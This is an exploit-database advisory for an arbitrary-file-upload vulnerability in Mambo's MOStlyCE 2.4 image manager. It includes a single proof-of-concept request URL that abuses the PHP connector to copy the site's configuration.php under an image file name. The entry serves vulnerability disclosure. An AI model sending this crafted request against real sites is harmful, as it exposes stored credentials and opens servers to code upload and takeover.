Mambo Module MOStlyCE 2.4 Image Manager Utility - Arbitrary File Upload

EDB-ID:

31068

CVE:

N/A




Platform:

PHP

Date:

2008-01-28


source: https://www.securityfocus.com/bid/27472/info

The MOStlyCE module for Mambo is prone to an arbitrary-file-upload vulnerability because the application fails to sufficiently sanitize user-supplied input.

Exploiting this issue could allow an attacker to upload and execute arbitrary script code in the context of the affected webserver process.

MOStlyCE 2.4 included with Mambo 4.6.3 is vulnerable; other versions may also be affected. 

http://localhost/MamboV4.6.3/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?Command=FileUpload&file=a&file[NewFile][name]=abc.gif&file[NewFile][tmp_name]=C:/path/to/MamboV4.6.2/configuration.php&file[NewFile][size]=1&CurrentFolder=